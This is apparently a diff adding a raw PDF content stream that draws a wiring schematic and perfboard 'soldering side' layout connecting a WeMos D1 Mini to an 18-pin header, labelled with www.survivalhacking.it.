+0.53 0.00 0.00 RG
+[] 0 d
+530.000 295.500 m
+550.000 295.500 l
+S
+BT
+/F1 9 Tf
+9.00 TL
+0.000 0.000 1.000 rg
+552.00 282.50 Td
+(A6) Tj
+ET
+BT
+/F1 9 Tf
+9.00 TL
+0.000 0.000 1.000 rg
+539.28 286.50 Td
+(3) Tj
+ET
+1 J
+1 j
+1.00 w
+0.53 0.00 0.00 RG
+[] 0 d
+530.000 285.500 m
+550.000 285.500 l
+S
+BT
+/F1 9 Tf
+9.00 TL
+0.000 0.000 1.000 rg
+552.00 272.50 Td
+(A4) Tj
+ET
+BT
+/F1 9 Tf
+9.00 TL
+0.000 0.000 1.000 rg
+539.28 276.50 Td
+(4) Tj
+ET
+1 J
+1 j
+1.00 w
+0.53 0.00 0.00 RG
+[] 0 d
+530.000 275.500 m
+550.000 275.500 l
+S
+BT
+/F1 9 Tf
+9.00 TL
+0.000 0.000 1.000 rg
+552.00 262.50 Td
+(B3) Tj
+ET
+BT
+/F1 9 Tf
+9.00 TL
+0.000 0.000 1.000 rg
+539.28 266.50 Td
+(5) Tj
+ET
+1 J
+1 j
+1.00 w
+0.53 0.00 0.00 RG
+[] 0 d
+530.000 265.500 m
+550.000 265.500 l
+S
+BT
+/F1 9 Tf
+9.00 TL
+0.000 0.000 1.000 rg
+552.00 252.50 Td
+(B2) Tj
+ET
+BT
+/F1 9 Tf
+9.00 TL
+0.000 0.000 1.000 rg
+539.28 256.50 Td
+(6) Tj
+ET
+1 J
+1 j
+1.00 w
+0.53 0.00 0.00 RG
+[] 0 d
+530.000 255.500 m
+550.000 255.500 l
+S
+2 J
+0 j
+100 M
+1.00 w
+0.00 G
+[] 0 d
+550.00 315.50 30.00 -200.00 re
+S
+BT
+/F1 9 Tf
+9.00 TL
+0.000 0.000 1.000 rg
+552.00 232.50 Td
+(GND) Tj
+ET
+BT
+/F1 9 Tf
+9.00 TL
+0.000 0.000 1.000 rg
+539.28 236.50 Td
+(8) Tj
+ET
+1 J
+1 j
+1.00 w
+0.53 0.00 0.00 RG
+[] 0 d
+530.000 235.500 m
+550.000 235.500 l
+S
+BT
+/F1 9 Tf
+9.00 TL
+0.000 0.000 1.000 rg
+552.00 242.50 Td
+(C3) Tj
+ET
+BT
+/F1 9 Tf
+9.00 TL
+0.000 0.000 1.000 rg
+539.28 246.50 Td
+(7) Tj
+ET
+1 J
+1 j
+1.00 w
+0.53 0.00 0.00 RG
+[] 0 d
+530.000 245.500 m
+550.000 245.500 l
+S
+BT
+/F1 9 Tf
+9.00 TL
+0.000 0.000 1.000 rg
+552.00 212.50 Td
+(3v3) Tj
+ET
+BT
+/F1 9 Tf
+9.00 TL
+0.000 0.000 1.000 rg
+539.28 216.50 Td
+(9) Tj
+ET
+1 J
+1 j
+1.00 w
+0.53 0.00 0.00 RG
+[] 0 d
+530.000 215.500 m
+550.000 215.500 l
+S
+BT
+/F1 9 Tf
+9.00 TL
+0.000 0.000 1.000 rg
+552.00 202.50 Td
+(SWC) Tj
+ET
+BT
+/F1 9 Tf
+9.00 TL
+0.000 0.000 1.000 rg
+533.57 206.50 Td
+(10) Tj
+ET
+1 J
+1 j
+1.00 w
+0.53 0.00 0.00 RG
+[] 0 d
+530.000 205.500 m
+550.000 205.500 l
+S
+BT
+/F1 9 Tf
+9.00 TL
+0.000 0.000 1.000 rg
+552.00 192.50 Td
+(GND) Tj
+ET
+BT
+/F1 9 Tf
+9.00 TL
+0.000 0.000 1.000 rg
+533.57 196.50 Td
+(11) Tj
+ET
+1 J
+1 j
+1.00 w
+0.53 0.00 0.00 RG
+[] 0 d
+530.000 195.500 m
+550.000 195.500 l
+S
+BT
+/F1 9 Tf
+9.00 TL
+0.000 0.000 1.000 rg
+552.00 182.50 Td
+(SIO) Tj
+ET
+BT
+/F1 9 Tf
+9.00 TL
+0.000 0.000 1.000 rg
+533.57 186.50 Td
+(12) Tj
+ET
+1 J
+1 j
+1.00 w
+0.53 0.00 0.00 RG
+[] 0 d
+530.000 185.500 m
+550.000 185.500 l
+S
+BT
+/F1 9 Tf
+9.00 TL
+0.000 0.000 1.000 rg
+552.00 172.50 Td
+(TX) Tj
+ET
+BT
+/F1 9 Tf
+9.00 TL
+0.000 0.000 1.000 rg
+533.57 176.50 Td
+(13) Tj
+ET
+1 J
+1 j
+1.00 w
+0.53 0.00 0.00 RG
+[] 0 d
+530.000 175.500 m
+550.000 175.500 l
+S
+BT
+/F1 9 Tf
+9.00 TL
+0.000 0.000 1.000 rg
+552.00 162.50 Td
+(RX) Tj
+ET
+BT
+/F1 9 Tf
+9.00 TL
+0.000 0.000 1.000 rg
+533.57 166.50 Td
+(14) Tj
+ET
+1 J
+1 j
+1.00 w
+0.53 0.00 0.00 RG
+[] 0 d
+530.000 165.500 m
+550.000 165.500 l
+S
+BT
+/F1 9 Tf
+9.00 TL
+0.000 0.000 1.000 rg
+552.00 152.50 Td
+(C1) Tj
+ET
+BT
+/F1 9 Tf
+9.00 TL
+0.000 0.000 1.000 rg
+533.57 156.50 Td
+(15) Tj
+ET
+1 J
+1 j
+1.00 w
+0.53 0.00 0.00 RG
+[] 0 d
+530.000 155.500 m
+550.000 155.500 l
+S
+BT
+/F1 9 Tf
+9.00 TL
+0.000 0.000 1.000 rg
+552.00 142.50 Td
+(C0) Tj
+ET
+BT
+/F1 9 Tf
+9.00 TL
+0.000 0.000 1.000 rg
+533.57 146.50 Td
+(16) Tj
+ET
+1 J
+1 j
+1.00 w
+0.53 0.00 0.00 RG
+[] 0 d
+530.000 145.500 m
+550.000 145.500 l
+S
+BT
+/F1 9 Tf
+9.00 TL
+0.000 0.000 1.000 rg
+552.00 132.50 Td
+(1W) Tj
+ET
+BT
+/F1 9 Tf
+9.00 TL
+0.000 0.000 1.000 rg
+533.57 136.50 Td
+(17) Tj
+ET
+1 J
+1 j
+1.00 w
+0.53 0.00 0.00 RG
+[] 0 d
+530.000 135.500 m
+550.000 135.500 l
+S
+BT
+/F1 9 Tf
+9.00 TL
+0.000 0.000 1.000 rg
+552.00 122.50 Td
+(GND) Tj
+ET
+BT
+/F1 9 Tf
+9.00 TL
+0.000 0.000 1.000 rg
+533.57 126.50 Td
+(18) Tj
+ET
+1 J
+1 j
+1.00 w
+0.53 0.00 0.00 RG
+[] 0 d
+530.000 125.500 m
+550.000 125.500 l
+S
+10.00 w
+BT
+/F4 9 Tf
+9.00 TL
+0.000 0.000 0.502 rg
+289.74 227.23 Td
+(WeMosD1Mini) Tj
+ET
+10.00 w
+BT
+/F4 9 Tf
+9.00 TL
+0.000 0.000 0.502 rg
+314.03 237.23 Td
+(U1) Tj
+ET
+1 J
+1 j
+1.00 w
+0.55 0.14 0.14 RG
+0.00 g
+[] 0 d
+290.000 135.500 m
+290.000 225.500 l
+S
+1 J
+1 j
+1.00 w
+0.55 0.14 0.14 RG
+0.00 g
+[] 0 d
+290.000 225.500 m
+350.000 225.500 l
+S
+1 J
+1 j
+1.00 w
+0.55 0.14 0.14 RG
+0.00 g
+[] 0 d
+350.000 225.500 m
+350.000 135.500 l
+S
+1 J
+1 j
+1.00 w
+0.55 0.14 0.14 RG
+0.00 g
+[] 0 d
+350.000 135.500 m
+290.000 135.500 l
+S
+BT
+/F1 9 Tf
+9.00 TL
+0.553 0.137 0.137 rg
+293.00 142.50 Td
+(3V3) Tj
+ET
+BT
+/F1 9 Tf
+9.00 TL
+0.553 0.137 0.137 rg
+266.42 146.50 Td
+(3V3) Tj
+ET
+1 J
+1 j
+1.00 w
+0.55 0.14 0.14 RG
+[] 0 d
+270.000 145.500 m
+290.000 145.500 l
+S
+BT
+/F1 9 Tf
+9.00 TL
+0.553 0.137 0.137 rg
+293.00 152.50 Td
+(D8) Tj
+ET
+BT
+/F1 9 Tf
+9.00 TL
+0.553 0.137 0.137 rg
+271.36 156.50 Td
+(D8) Tj
+ET
+1 J
+1 j
+1.00 w
+0.55 0.14 0.14 RG
+[] 0 d
+270.000 155.500 m
+290.000 155.500 l
+S
+BT
+/F1 9 Tf
+9.00 TL
+0.553 0.137 0.137 rg
+293.00 162.50 Td
+(D7) Tj
+ET
+BT
+/F1 9 Tf
+9.00 TL
+0.553 0.137 0.137 rg
+271.36 166.50 Td
+(D7) Tj
+ET
+1 J
+1 j
+1.00 w
+0.55 0.14 0.14 RG
+[] 0 d
+270.000 165.500 m
+290.000 165.500 l
+S
+BT
+/F1 9 Tf
+9.00 TL
+0.553 0.137 0.137 rg
+293.00 172.50 Td
+(D6) Tj
+ET
+BT
+/F1 9 Tf
+9.00 TL
+0.553 0.137 0.137 rg
+271.36 176.50 Td
+(D6) Tj
+ET
+1 J
+1 j
+1.00 w
+0.55 0.14 0.14 RG
+[] 0 d
+270.000 175.500 m
+290.000 175.500 l
+S
+BT
+/F1 9 Tf
+9.00 TL
+0.553 0.137 0.137 rg
+293.00 182.50 Td
+(D5) Tj
+ET
+BT
+/F1 9 Tf
+9.00 TL
+0.553 0.137 0.137 rg
+271.36 186.50 Td
+(D5) Tj
+ET
+1 J
+1 j
+1.00 w
+0.55 0.14 0.14 RG
+[] 0 d
+270.000 185.500 m
+290.000 185.500 l
+S
+BT
+/F1 9 Tf
+9.00 TL
+0.553 0.137 0.137 rg
+293.00 192.50 Td
+(D0) Tj
+ET
+BT
+/F1 9 Tf
+9.00 TL
+0.553 0.137 0.137 rg
+271.36 196.50 Td
+(D0) Tj
+ET
+1 J
+1 j
+1.00 w
+0.55 0.14 0.14 RG
+[] 0 d
+270.000 195.500 m
+290.000 195.500 l
+S
+BT
+/F1 9 Tf
+9.00 TL
+0.553 0.137 0.137 rg
+293.00 202.50 Td
+(A0) Tj
+ET
+BT
+/F1 9 Tf
+9.00 TL
+0.553 0.137 0.137 rg
+272.14 206.50 Td
+(A0) Tj
+ET
+1 J
+1 j
+1.00 w
+0.55 0.14 0.14 RG
+[] 0 d
+270.000 205.500 m
+290.000 205.500 l
+S
+BT
+/F1 9 Tf
+9.00 TL
+0.553 0.137 0.137 rg
+293.00 212.50 Td
+(RST) Tj
+ET
+BT
+/F1 9 Tf
+9.00 TL
+0.553 0.137 0.137 rg
+266.05 216.50 Td
+(RST) Tj
+ET
+1 J
+1 j
+1.00 w
+0.55 0.14 0.14 RG
+[] 0 d
+270.000 215.500 m
+290.000 215.500 l
+S
+BT
+/F1 9 Tf
+9.00 TL
+0.553 0.137 0.137 rg
+335.14 142.50 Td
+(5V) Tj
+ET
+BT
+/F1 9 Tf
+9.00 TL
+0.553 0.137 0.137 rg
+356.00 146.50 Td
+(5V) Tj
+ET
+1 J
+1 j
+1.00 w
+0.55 0.14 0.14 RG
+[] 0 d
+370.000 145.500 m
+350.000 145.500 l
+S
+BT
+/F1 9 Tf
+9.00 TL
+0.553 0.137 0.137 rg
+326.36 152.50 Td
+(GND) Tj
+ET
+BT
+/F1 9 Tf
+9.00 TL
+0.553 0.137 0.137 rg
+356.00 156.50 Td
+(GND) Tj
+ET
+1 J
+1 j
+1.00 w
+0.55 0.14 0.14 RG
+[] 0 d
+370.000 155.500 m
+350.000 155.500 l
+S
+BT
+/F1 9 Tf
+9.00 TL
+0.553 0.137 0.137 rg
+334.36 162.50 Td
+(D4) Tj
+ET
+BT
+/F1 9 Tf
+9.00 TL
+0.553 0.137 0.137 rg
+356.00 166.50 Td
+(D4) Tj
+ET
+1 J
+1 j
+1.00 w
+0.55 0.14 0.14 RG
+[] 0 d
+370.000 165.500 m
+350.000 165.500 l
+S
+BT
+/F1 9 Tf
+9.00 TL
+0.553 0.137 0.137 rg
+334.36 172.50 Td
+(D3) Tj
+ET
+BT
+/F1 9 Tf
+9.00 TL
+0.553 0.137 0.137 rg
+356.00 176.50 Td
+(D3) Tj
+ET
+1 J
+1 j
+1.00 w
+0.55 0.14 0.14 RG
+[] 0 d
+370.000 175.500 m
+350.000 175.500 l
+S
+BT
+/F1 9 Tf
+9.00 TL
+0.553 0.137 0.137 rg
+334.36 182.50 Td
+(D2) Tj
+ET
+BT
+/F1 9 Tf
+9.00 TL
+0.553 0.137 0.137 rg
+356.00 186.50 Td
+(D2) Tj
+ET
+1 J
+1 j
+1.00 w
+0.55 0.14 0.14 RG
+[] 0 d
+370.000 185.500 m
+350.000 185.500 l
+S
+BT
+/F1 9 Tf
+9.00 TL
+0.553 0.137 0.137 rg
+334.36 192.50 Td
+(D1) Tj
+ET
+BT
+/F1 9 Tf
+9.00 TL
+0.553 0.137 0.137 rg
+356.00 196.50 Td
+(D1) Tj
+ET
+1 J
+1 j
+1.00 w
+0.55 0.14 0.14 RG
+[] 0 d
+370.000 195.500 m
+350.000 195.500 l
+S
+BT
+/F1 9 Tf
+9.00 TL
+0.553 0.137 0.137 rg
+334.58 202.50 Td
+(RX) Tj
+ET
+BT
+/F1 9 Tf
+9.00 TL
+0.553 0.137 0.137 rg
+356.00 206.50 Td
+(RX) Tj
+ET
+1 J
+1 j
+1.00 w
+0.55 0.14 0.14 RG
+[] 0 d
+370.000 205.500 m
+350.000 205.500 l
+S
+BT
+/F1 9 Tf
+9.00 TL
+0.553 0.137 0.137 rg
+335.29 212.50 Td
+(TX) Tj
+ET
+BT
+/F1 9 Tf
+9.00 TL
+0.553 0.137 0.137 rg
+356.00 216.50 Td
+(TX) Tj
+ET
+1 J
+1 j
+1.00 w
+0.55 0.14 0.14 RG
+[] 0 d
+370.000 215.500 m
+350.000 215.500 l
+S
+1 J
+1 j
+1.00 w
+0.00 0.53 0.00 RG
+0.00 g
+[] 0 d
+530.000 305.500 m
+405.000 305.500 l
+405.000 145.500 l
+370.000 145.500 l
+S
+1 J
+1 j
+1.00 w
+0.00 0.53 0.00 RG
+0.00 g
+[] 0 d
+370.000 155.500 m
+415.000 155.500 l
+415.000 235.500 l
+530.000 235.500 l
+S
+1 J
+1 j
+1.00 w
+0.00 0.53 0.00 RG
+0.00 g
+[] 0 d
+530.000 125.500 m
+510.000 125.500 l
+510.000 145.500 l
+530.000 145.500 l
+S
+1 J
+1 j
+1.00 w
+0.00 0.53 0.00 RG
+0.00 g
+[] 0 d
+530.000 165.500 m
+425.000 165.500 l
+425.000 215.500 l
+370.000 215.500 l
+S
+1 J
+1 j
+1.00 w
+0.00 0.53 0.00 RG
+0.00 g
+[] 0 d
+530.000 175.500 m
+435.000 175.500 l
+435.000 205.500 l
+370.000 205.500 l
+S
+1 J
+1 j
+1.00 w
+0.00 0.53 0.00 RG
+0.00 g
+[] 0 d
+530.000 245.500 m
+250.000 245.500 l
+250.000 185.500 l
+270.000 185.500 l
+S
+1 J
+1 j
+1.00 w
+0.00 0.53 0.00 RG
+0.00 g
+[] 0 d
+530.000 255.500 m
+240.000 255.500 l
+240.000 175.500 l
+270.000 175.500 l
+S
+1 J
+1 j
+1.00 w
+0.00 0.53 0.00 RG
+0.00 g
+[] 0 d
+530.000 265.500 m
+230.000 265.500 l
+230.000 165.500 l
+270.000 165.500 l
+S
+1 J
+1 j
+1.00 w
+0.00 0.53 0.00 RG
+0.00 g
+[] 0 d
+530.000 275.500 m
+220.000 275.500 l
+220.000 155.500 l
+270.000 155.500 l
+S
+1 J
+1 j
+1.00 w
+0.20 0.80 0.20 RG
+[] 0 d
+526.000 289.500 m
+534.000 281.500 l
+534.000 289.500 m
+526.000 281.500 l
+S
+1 J
+1 j
+1.00 w
+0.20 0.80 0.20 RG
+[] 0 d
+526.000 299.500 m
+534.000 291.500 l
+534.000 299.500 m
+526.000 291.500 l
+S
+1 J
+1 j
+1.00 w
+0.20 0.80 0.20 RG
+[] 0 d
+526.000 219.500 m
+534.000 211.500 l
+534.000 219.500 m
+526.000 211.500 l
+S
+1 J
+1 j
+1.00 w
+0.20 0.80 0.20 RG
+[] 0 d
+526.000 209.500 m
+534.000 201.500 l
+534.000 209.500 m
+526.000 201.500 l
+S
+1 J
+1 j
+1.00 w
+0.20 0.80 0.20 RG
+[] 0 d
+526.000 199.500 m
+534.000 191.500 l
+534.000 199.500 m
+526.000 191.500 l
+S
+1 J
+1 j
+1.00 w
+0.20 0.80 0.20 RG
+[] 0 d
+526.000 189.500 m
+534.000 181.500 l
+534.000 189.500 m
+526.000 181.500 l
+S
+1 J
+1 j
+1.00 w
+0.20 0.80 0.20 RG
+[] 0 d
+526.000 159.500 m
+534.000 151.500 l
+534.000 159.500 m
+526.000 151.500 l
+S
+1 J
+1 j
+1.00 w
+0.20 0.80 0.20 RG
+[] 0 d
+526.000 139.500 m
+534.000 131.500 l
+534.000 139.500 m
+526.000 131.500 l
+S
+1 J
+1 j
+1.00 w
+0.20 0.80 0.20 RG
+[] 0 d
+366.000 169.500 m
+374.000 161.500 l
+374.000 169.500 m
+366.000 161.500 l
+S
+1 J
+1 j
+1.00 w
+0.20 0.80 0.20 RG
+[] 0 d
+366.000 179.500 m
+374.000 171.500 l
+374.000 179.500 m
+366.000 171.500 l
+S
+1 J
+1 j
+1.00 w
+0.20 0.80 0.20 RG
+[] 0 d
+366.000 189.500 m
+374.000 181.500 l
+374.000 189.500 m
+366.000 181.500 l
+S
+1 J
+1 j
+1.00 w
+0.20 0.80 0.20 RG
+[] 0 d
+366.000 199.500 m
+374.000 191.500 l
+374.000 199.500 m
+366.000 191.500 l
+S
+1 J
+1 j
+1.00 w
+0.20 0.80 0.20 RG
+[] 0 d
+266.000 199.500 m
+274.000 191.500 l
+274.000 199.500 m
+266.000 191.500 l
+S
+1 J
+1 j
+1.00 w
+0.20 0.80 0.20 RG
+[] 0 d
+266.000 209.500 m
+274.000 201.500 l
+274.000 209.500 m
+266.000 201.500 l
+S
+1 J
+1 j
+1.00 w
+0.20 0.80 0.20 RG
+[] 0 d
+266.000 219.500 m
+274.000 211.500 l
+274.000 219.500 m
+266.000 211.500 l
+S
+1 J
+1 j
+1.00 w
+0.20 0.80 0.20 RG
+[] 0 d
+266.000 149.500 m
+274.000 141.500 l
+274.000 149.500 m
+266.000 141.500 l
+S
+10.00 w
+BT
+/F3 24 Tf
+24.00 TL
+0.000 g
+770.00 255.50 Td
+(www.survivalhacking.it) Tj
+ET
+1.00 w
+0.00 G
+[] 0 d
+200.00 440.50 m 200.00 443.26 197.76 445.50 195.00 445.50 c
+192.24 445.50 190.00 443.26 190.00 440.50 c
+190.00 437.74 192.24 435.50 195.00 435.50 c
+197.76 435.50 200.00 437.74 200.00 440.50 c
+S
+1.00 w
+0.00 G
+[] 0 d
+215.00 440.50 m 215.00 443.26 212.76 445.50 210.00 445.50 c
+207.24 445.50 205.00 443.26 205.00 440.50 c
+205.00 437.74 207.24 435.50 210.00 435.50 c
+212.76 435.50 215.00 437.74 215.00 440.50 c
+S
+1.00 w
+0.00 G
+[] 0 d
+230.00 440.50 m 230.00 443.26 227.76 445.50 225.00 445.50 c
+222.24 445.50 220.00 443.26 220.00 440.50 c
+220.00 437.74 222.24 435.50 225.00 435.50 c
+227.76 435.50 230.00 437.74 230.00 440.50 c
+S
+1.00 w
+0.00 G
+[] 0 d
+245.00 440.50 m 245.00 443.26 242.76 445.50 240.00 445.50 c
+237.24 445.50 235.00 443.26 235.00 440.50 c
+235.00 437.74 237.24 435.50 240.00 435.50 c
+242.76 435.50 245.00 437.74 245.00 440.50 c
+S
+1.00 w
+0.00 G
+[] 0 d
+260.00 440.50 m 260.00 443.26 257.76 445.50 255.00 445.50 c
+252.24 445.50 250.00 443.26 250.00 440.50 c
+250.00 437.74 252.24 435.50 255.00 435.50 c
+257.76 435.50 260.00 437.74 260.00 440.50 c
+S
+1.00 w
+0.00 G
+[] 0 d
+275.00 440.50 m 275.00 443.26 272.76 445.50 270.00 445.50 c
+267.24 445.50 265.00 443.26 265.00 440.50 c
+265.00 437.74 267.24 435.50 270.00 435.50 c
+272.76 435.50 275.00 437.74 275.00 440.50 c
+S
+1.00 w
+0.00 G
+[] 0 d
+290.00 440.50 m 290.00 443.26 287.76 445.50 285.00 445.50 c
+282.24 445.50 280.00 443.26 280.00 440.50 c
+280.00 437.74 282.24 435.50 285.00 435.50 c
+287.76 435.50 290.00 437.74 290.00 440.50 c
+S
+1.00 w
+0.00 G
+[] 0 d
+305.00 440.50 m 305.00 443.26 302.76 445.50 300.00 445.50 c
+297.24 445.50 295.00 443.26 295.00 440.50 c
+295.00 437.74 297.24 435.50 300.00 435.50 c
+302.76 435.50 305.00 437.74 305.00 440.50 c
+S
+1.00 w
+0.00 G
+[] 0 d
+320.00 440.50 m 320.00 443.26 317.76 445.50 315.00 445.50 c
+312.24 445.50 310.00 443.26 310.00 440.50 c
+310.00 437.74 312.24 435.50 315.00 435.50 c
+317.76 435.50 320.00 437.74 320.00 440.50 c
+S
+1.00 w
+0.00 G
+[] 0 d
+335.00 440.50 m 335.00 443.26 332.76 445.50 330.00 445.50 c
+327.24 445.50 325.00 443.26 325.00 440.50 c
+325.00 437.74 327.24 435.50 330.00 435.50 c
+332.76 435.50 335.00 437.74 335.00 440.50 c
+S
+1.00 w
+0.00 G
+[] 0 d
+500.00 440.50 m 500.00 443.26 497.76 445.50 495.00 445.50 c
+492.24 445.50 490.00 443.26 490.00 440.50 c
+490.00 437.74 492.24 435.50 495.00 435.50 c
+497.76 435.50 500.00 437.74 500.00 440.50 c
+S
+1.00 w
+0.00 G
+[] 0 d
+515.00 440.50 m 515.00 443.26 512.76 445.50 510.00 445.50 c
+507.24 445.50 505.00 443.26 505.00 440.50 c
+505.00 437.74 507.24 435.50 510.00 435.50 c
+512.76 435.50 515.00 437.74 515.00 440.50 c
+S
+1.00 w
+0.00 G
+[] 0 d
+530.00 440.50 m 530.00 443.26 527.76 445.50 525.00 445.50 c
+522.24 445.50 520.00 443.26 520.00 440.50 c
+520.00 437.74 522.24 435.50 525.00 435.50 c
+527.76 435.50 530.00 437.74 530.00 440.50 c
+S
+1.00 w
+0.00 G
+[] 0 d
+545.00 440.50 m 545.00 443.26 542.76 445.50 540.00 445.50 c
+537.24 445.50 535.00 443.26 535.00 440.50 c
+535.00 437.74 537.24 435.50 540.00 435.50 c
+542.76 435.50 545.00 437.74 545.00 440.50 c
+S
+1.00 w
+0.00 G
+[] 0 d
+560.00 440.50 m 560.00 443.26 557.76 445.50 555.00 445.50 c
+552.24 445.50 550.00 443.26 550.00 440.50 c
+550.00 437.74 552.24 435.50 555.00 435.50 c
+557.76 435.50 560.00 437.74 560.00 440.50 c
+S
+1.00 w
+0.00 G
+[] 0 d
+575.00 440.50 m 575.00 443.26 572.76 445.50 570.00 445.50 c
+567.24 445.50 565.00 443.26 565.00 440.50 c
+565.00 437.74 567.24 435.50 570.00 435.50 c
+572.76 435.50 575.00 437.74 575.00 440.50 c
+S
+1.00 w
+0.00 G
+[] 0 d
+590.00 440.50 m 590.00 443.26 587.76 445.50 585.00 445.50 c
+582.24 445.50 580.00 443.26 580.00 440.50 c
+580.00 437.74 582.24 435.50 585.00 435.50 c
+587.76 435.50 590.00 437.74 590.00 440.50 c
+S
+1.00 w
+0.00 G
+[] 0 d
+605.00 440.50 m 605.00 443.26 602.76 445.50 600.00 445.50 c
+597.24 445.50 595.00 443.26 595.00 440.50 c
+595.00 437.74 597.24 435.50 600.00 435.50 c
+602.76 435.50 605.00 437.74 605.00 440.50 c
+S
+1.00 w
+0.00 G
+[] 0 d
+360.00 585.50 m 360.00 588.26 357.76 590.50 355.00 590.50 c
+352.24 590.50 350.00 588.26 350.00 585.50 c
+350.00 582.74 352.24 580.50 355.00 580.50 c
+357.76 580.50 360.00 582.74 360.00 585.50 c
+S
+1.00 w
+0.00 G
+[] 0 d
+360.00 570.50 m 360.00 573.26 357.76 575.50 355.00 575.50 c
+352.24 575.50 350.00 573.26 350.00 570.50 c
+350.00 567.74 352.24 565.50 355.00 565.50 c
+357.76 565.50 360.00 567.74 360.00 570.50 c
+S
+1.00 w
+0.00 G
+[] 0 d
+360.00 555.50 m 360.00 558.26 357.76 560.50 355.00 560.50 c
+352.24 560.50 350.00 558.26 350.00 555.50 c
+350.00 552.74 352.24 550.50 355.00 550.50 c
+357.76 550.50 360.00 552.74 360.00 555.50 c
+S
+1.00 w
+0.00 G
+[] 0 d
+360.00 540.50 m 360.00 543.26 357.76 545.50 355.00 545.50 c
+352.24 545.50 350.00 543.26 350.00 540.50 c
+350.00 537.74 352.24 535.50 355.00 535.50 c
+357.76 535.50 360.00 537.74 360.00 540.50 c
+S
+1.00 w
+0.00 G
+[] 0 d
+360.00 525.50 m 360.00 528.26 357.76 530.50 355.00 530.50 c
+352.24 530.50 350.00 528.26 350.00 525.50 c
+350.00 522.74 352.24 520.50 355.00 520.50 c
+357.76 520.50 360.00 522.74 360.00 525.50 c
+S
+1.00 w
+0.00 G
+[] 0 d
+360.00 510.50 m 360.00 513.26 357.76 515.50 355.00 515.50 c
+352.24 515.50 350.00 513.26 350.00 510.50 c
+350.00 507.74 352.24 505.50 355.00 505.50 c
+357.76 505.50 360.00 507.74 360.00 510.50 c
+S
+1.00 w
+0.00 G
+[] 0 d
+360.00 495.50 m 360.00 498.26 357.76 500.50 355.00 500.50 c
+352.24 500.50 350.00 498.26 350.00 495.50 c
+350.00 492.74 352.24 490.50 355.00 490.50 c
+357.76 490.50 360.00 492.74 360.00 495.50 c
+S
+1.00 w
+0.00 G
+[] 0 d
+360.00 480.50 m 360.00 483.26 357.76 485.50 355.00 485.50 c
+352.24 485.50 350.00 483.26 350.00 480.50 c
+350.00 477.74 352.24 475.50 355.00 475.50 c
+357.76 475.50 360.00 477.74 360.00 480.50 c
+S
+1.00 w
+0.00 G
+[] 0 d
+470.00 585.50 m 470.00 588.26 467.76 590.50 465.00 590.50 c
+462.24 590.50 460.00 588.26 460.00 585.50 c
+460.00 582.74 462.24 580.50 465.00 580.50 c
+467.76 580.50 470.00 582.74 470.00 585.50 c
+S
+1.00 w
+0.00 G
+[] 0 d
+470.00 570.50 m 470.00 573.26 467.76 575.50 465.00 575.50 c
+462.24 575.50 460.00 573.26 460.00 570.50 c
+460.00 567.74 462.24 565.50 465.00 565.50 c
+467.76 565.50 470.00 567.74 470.00 570.50 c
+S
+1.00 w
+0.00 G
+[] 0 d
+470.00 555.50 m 470.00 558.26 467.76 560.50 465.00 560.50 c
+462.24 560.50 460.00 558.26 460.00 555.50 c
+460.00 552.74 462.24 550.50 465.00 550.50 c
+467.76 550.50 470.00 552.74 470.00 555.50 c
+S
+1.00 w
+0.00 G
+[] 0 d
+470.00 540.50 m 470.00 543.26 467.76 545.50 465.00 545.50 c
+462.24 545.50 460.00 543.26 460.00 540.50 c
+460.00 537.74 462.24 535.50 465.00 535.50 c
+467.76 535.50 470.00 537.74 470.00 540.50 c
+S
+1.00 w
+0.00 G
+[] 0 d
+470.00 525.50 m 470.00 528.26 467.76 530.50 465.00 530.50 c
+462.24 530.50 460.00 528.26 460.00 525.50 c
+460.00 522.74 462.24 520.50 465.00 520.50 c
+467.76 520.50 470.00 522.74 470.00 525.50 c
+S
+1.00 w
+0.00 G
+[] 0 d
+470.00 510.50 m 470.00 513.26 467.76 515.50 465.00 515.50 c
+462.24 515.50 460.00 513.26 460.00 510.50 c
+460.00 507.74 462.24 505.50 465.00 505.50 c
+467.76 505.50 470.00 507.74 470.00 510.50 c
+S
+1.00 w
+0.00 G
+[] 0 d
+470.00 495.50 m 470.00 498.26 467.76 500.50 465.00 500.50 c
+462.24 500.50 460.00 498.26 460.00 495.50 c
+460.00 492.74 462.24 490.50 465.00 490.50 c
+467.76 490.50 470.00 492.74 470.00 495.50 c
+S
+1.00 w
+0.00 G
+[] 0 d
+470.00 480.50 m 470.00 483.26 467.76 485.50 465.00 485.50 c
+462.24 485.50 460.00 483.26 460.00 480.50 c
+460.00 477.74 462.24 475.50 465.00 475.50 c
+467.76 475.50 470.00 477.74 470.00 480.50 c
+S
+1 J
+1 j
+4.00 w
+0.00 0.00 1.00 RG
+0.00 g
+[] 0 d
+195.000 445.500 m
+195.000 465.500 l
+225.000 465.500 l
+225.000 445.500 l
+S
+1 J
+1 j
+4.00 w
+0.00 1.00 0.00 RG
+0.00 g
+[] 0 d
+255.000 445.500 m
+255.000 585.500 l
+350.000 585.500 l
+S
+1 J
+1 j
+4.00 w
+0.00 1.00 1.00 RG
+0.00 g
+[] 0 d
+350.000 570.500 m
+270.000 570.500 l
+270.000 445.500 l
+S
+1 J
+1 j
+4.00 w
+0.00 G
+0.00 g
+[] 0 d
+490.000 440.500 m
+400.000 440.500 l
+400.000 495.500 l
+360.000 495.500 l
+S
+1 J
+1 j
+4.00 w
+1.00 0.00 0.00 RG
+0.00 g
+[] 0 d
+600.000 445.500 m
+600.000 460.500 l
+415.000 460.500 l
+415.000 480.500 l
+360.000 480.500 l
+S
+1 J
+1 j
+4.00 w
+1.00 0.00 1.00 RG
+0.00 g
+[] 0 d
+470.000 540.500 m
+510.000 540.500 l
+510.000 445.500 l
+S
+1 J
+1 j
+4.00 w
+0.00 1.00 1.00 RG
+0.00 g
+[] 0 d
+470.000 525.500 m
+525.000 525.500 l
+525.000 445.500 l
+S
+1 J
+1 j
+4.00 w
+0.00 0.00 1.00 RG
+0.00 g
+[] 0 d
+470.000 510.500 m
+540.000 510.500 l
+540.000 445.500 l
+S
+1 J
+1 j
+4.00 w
+0.00 1.00 0.00 RG
+0.00 g
+[] 0 d
+470.000 495.500 m
+555.000 495.500 l
+555.000 445.500 l
+S
+2 J
+0 j
+100 M
+1.00 w
+0.00 G
+[6.000 6.000] 0 d
+345.00 625.50 130.00 -155.00 re
+S
+10.00 w
+BT
+/F3 24 Tf
+24.00 TL
+0.000 g
+305.00 380.50 Td
+(soldering side) Tj
+ET
+10.00 w
+BT
+/F3 15 Tf
+15.00 TL
+0.000 g
+365.00 580.50 Td
+(TX) Tj
+ET
+10.00 w
+BT
+/F3 15 Tf
+15.00 TL
+0.000 g
+365.00 565.50 Td
+(RX) Tj
+ET
+10.00 w
+BT
